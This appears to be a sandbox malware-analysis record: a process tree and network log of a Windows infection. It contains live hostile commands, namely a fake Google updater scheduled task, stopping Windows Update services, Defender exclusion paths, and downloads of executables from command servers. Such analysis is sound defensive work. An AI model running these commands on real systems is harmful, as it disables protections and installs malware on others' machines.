C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:2124
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵PID:1148
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 02⤵PID:3764
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 02⤵PID:4264
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 02⤵PID:2272
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 02⤵PID:884
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵PID:3408
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵PID:4768
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 02⤵PID:2144
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 02⤵PID:3224
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 02⤵PID:4264
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 02⤵PID:2024
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"1⤵PID:3244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }1⤵PID:3820
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc1⤵PID:4624
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
PID:1648
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4240
-
-
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
PID:3748
-
-
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
PID:732 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:800
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:1444
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:1100
-
-
-
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
PID:2200
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵PID:4620
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 02⤵PID:3948
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 02⤵PID:4168
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 02⤵PID:4216
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 02⤵PID:3580
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"1⤵PID:3292
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }1⤵PID:1348
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"1⤵PID:4432
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"1⤵PID:4116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force1⤵PID:2300
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc1⤵PID:416
-
C:\Windows\System32\sc.exesc stop UsoSvc2⤵
- Launches sc.exe
PID:1512
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:4768
-
-
C:\Windows\System32\sc.exesc stop bits2⤵
- Launches sc.exe
PID:2752
-
-
C:\Windows\System32\sc.exesc stop dosvc2⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
PID:4756
-
-
C:\Windows\System32\sc.exesc stop wuauserv2⤵
- Launches sc.exe
PID:4412
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 01⤵PID:732
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 02⤵PID:1168
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#qbjrr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }1⤵PID:644
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe1⤵PID:4012
-
C:\Windows\explorer.exeC:\Windows\explorer.exe1⤵PID:3776
Network
-
Remote address:8.8.8.8:53Request135.121.18.2.in-addr.arpaIN PTRResponse135.121.18.2.in-addr.arpaIN PTRa2-18-121-135deploystaticakamaitechnologiescom
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ktsumaeudn.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 369
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 7
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kxyjr.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 217
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 49
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:8.8.8.8:53Request29.68.91.77.in-addr.arpaIN PTRResponse29.68.91.77.in-addr.arpaIN PTRhosted-by yeezyhostnet
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dtnqmly.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 121
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 49
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:8.8.8.8:53Request43.229.111.52.in-addr.arpaIN PTRResponse
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://eevbmxgjam.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 347
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 54
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://bvmama.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 144
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://fshgojl.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 229
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://dyxuahn.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 185
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 43
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://akneb.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 198
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://gaowerhe.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 281
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 45
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.29:80RequestPOST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nxgqffa.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 363
Host: 77.91.68.29
ResponseHTTP/1.1 404 Not Found
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
-
Remote address:77.91.68.78:80RequestGET /lend/xk555wjbvnhf3f.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.78
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 10 Sep 2023 13:27:24 GMT
ETag: "13ae00-605012b94d35a"
Accept-Ranges: bytes
Content-Length: 1289728
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
Remote address:77.91.68.78:80RequestGET /lend/build.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.78
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sun, 10 Sep 2023 15:00:11 GMT
ETag: "55600-6050277656643"
Accept-Ranges: bytes
Content-Length: 349696
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdos-program
-
Remote address:79.137.192.18:80RequestGET /rockas.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 79.137.192.18
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:28 GMT
Content-Type: application/octet-stream
Content-Length: 202752
Last-Modified: Thu, 31 Aug 2023 18:02:49 GMT
Connection: keep-alive
ETag: "64f0d5c9-31800"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request78.68.91.77.in-addr.arpaIN PTRResponse78.68.91.77.in-addr.arpaIN PTRhosted-by yeezyhostnet
-
Remote address:8.8.8.8:53Request18.192.137.79.in-addr.arpaIN PTRResponse18.192.137.79.in-addr.arpaIN PTRVPS-2059lethostnetwork
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 89
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestGET /ss41.exe HTTP/1.1
Host: 5.42.65.80
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:31 GMT
Content-Type: application/octet-stream
Content-Length: 606728
Last-Modified: Sun, 10 Sep 2023 19:14:33 GMT
Connection: keep-alive
ETag: "64fe1599-94208"
Accept-Ranges: bytes
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestGET /toolspub2.exe HTTP/1.1
Host: 5.42.65.80
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:37 GMT
Content-Type: application/octet-stream
Content-Length: 254464
Last-Modified: Sat, 09 Sep 2023 20:17:20 GMT
Connection: keep-alive
ETag: "64fcd2d0-3e200"
Accept-Ranges: bytes
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestGET /31839b57a4f11171d6abc8bbc4451ee4.exe HTTP/1.1
Host: 5.42.65.80
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:42 GMT
Content-Type: application/octet-stream
Content-Length: 4482440
Last-Modified: Sat, 09 Sep 2023 20:17:27 GMT
Connection: keep-alive
ETag: "64fcd2d7-446588"
Accept-Ranges: bytes
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:5.42.65.80:80RequestPOST /8bmeVwqx/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 5.42.65.80
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Requestz.nnnaajjjgc.comIN AResponsez.nnnaajjjgc.comIN A156.236.72.121
-
Remote address:8.8.8.8:53Request91.179.33.162.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request80.65.42.5.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request85.9.123.176.in-addr.arpaIN PTRResponse
-
Remote address:156.236.72.121:443RequestGET /sts/imagd.jpg HTTP/1.1
User-Agent: HTTPREAD
Host: z.nnnaajjjgc.com
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:36 GMT
Content-Type: image/jpeg
Content-Length: 1507532
Last-Modified: Thu, 07 Sep 2023 13:47:29 GMT
Connection: keep-alive
ETag: "64f9d471-1700cc"
Accept-Ranges: bytes
-
Remote address:95.214.27.254:80RequestGET /getfile/taskhost.exe HTTP/1.1
Host: 95.214.27.254
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:32 GMT
Content-Type: application/octet-stream
Content-Length: 1083904
Last-Modified: Sun, 10 Sep 2023 22:20:08 GMT
Connection: keep-alive
ETag: "64fe4118-108a00"
Accept-Ranges: bytes
-
Remote address:95.214.27.254:80RequestGET /getfile/winlog.exe HTTP/1.1
Host: 95.214.27.254
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:33 GMT
Content-Type: application/octet-stream
Content-Length: 2677032
Last-Modified: Fri, 08 Sep 2023 11:02:48 GMT
Connection: keep-alive
ETag: "64faff58-28d928"
Accept-Ranges: bytes
-
Remote address:95.214.27.254:80RequestGET /getfile/msedge.exe HTTP/1.1
Host: 95.214.27.254
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:35 GMT
Content-Type: application/octet-stream
Content-Length: 7330304
Last-Modified: Fri, 08 Sep 2023 11:06:34 GMT
Connection: keep-alive
ETag: "64fb003a-6fda00"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Requestapi.ip.sbIN AResponseapi.ip.sbIN CNAMEapi.ip.sb.cdn.cloudflare.netapi.ip.sb.cdn.cloudflare.netIN A172.67.75.172api.ip.sb.cdn.cloudflare.netIN A104.26.12.31api.ip.sb.cdn.cloudflare.netIN A104.26.13.31
-
Remote address:172.67.75.172:443RequestGET /ip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
Cache-Control: no-cache
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hnC2d5evXEWy7NAO9FphFFcrfMWq4Rx1oXE45i1fBr9vaTfl%2BQdcxgRbToNhyQ49SMUan3QXN43hh2lqowsiL9RsIOCsMsw7npbuSBhIJw81ifzF3bwOxCuIsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 804b14ec9cc10e4c-AMS
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Request254.27.214.95.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request172.75.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request121.72.236.156.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request254.111.26.67.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request142.33.222.23.in-addr.arpaIN PTRResponse142.33.222.23.in-addr.arpaIN PTRa23-222-33-142deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestamadapi.tuktuk.ugIN AResponseamadapi.tuktuk.ugIN A85.209.3.13
-
Remote address:8.8.8.8:53Request69.121.18.2.in-addr.arpaIN PTRResponse69.121.18.2.in-addr.arpaIN PTRa2-18-121-69deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request13.3.209.85.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestapp.nnnaajjjgc.comIN AResponseapp.nnnaajjjgc.comIN A154.221.26.108
-
Remote address:154.221.26.108:80RequestGET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Host: app.nnnaajjjgc.com
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
-
Remote address:154.221.26.108:80RequestPOST /check/?sid=178268&key=465b11cbde5df8fc23fe7106adf541ff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Length: 160
Host: app.nnnaajjjgc.com
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
-
Remote address:154.221.26.108:80RequestGET /check/safe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Host: app.nnnaajjjgc.com
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
-
Remote address:154.221.26.108:80RequestPOST /check/?sid=178290&key=5b9c77bf87b017a9685d804761b9310b HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Length: 160
Host: app.nnnaajjjgc.com
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.30
-
Remote address:8.8.8.8:53Request108.26.221.154.in-addr.arpaIN PTRResponse
-
Remote address:79.137.192.18:80RequestGET /latestX.exe HTTP/1.1
Host: 79.137.192.18
ResponseHTTP/1.1 200 OK
Date: Sun, 10 Sep 2023 22:24:51 GMT
Content-Type: application/octet-stream
Content-Length: 5874968
Last-Modified: Sun, 06 Aug 2023 06:35:01 GMT
Connection: keep-alive
ETag: "64cf3f15-59a518"
Accept-Ranges: bytes
-
Remote address:8.8.8.8:53Request38.148.119.40.in-addr.arpaIN PTRResponse
-
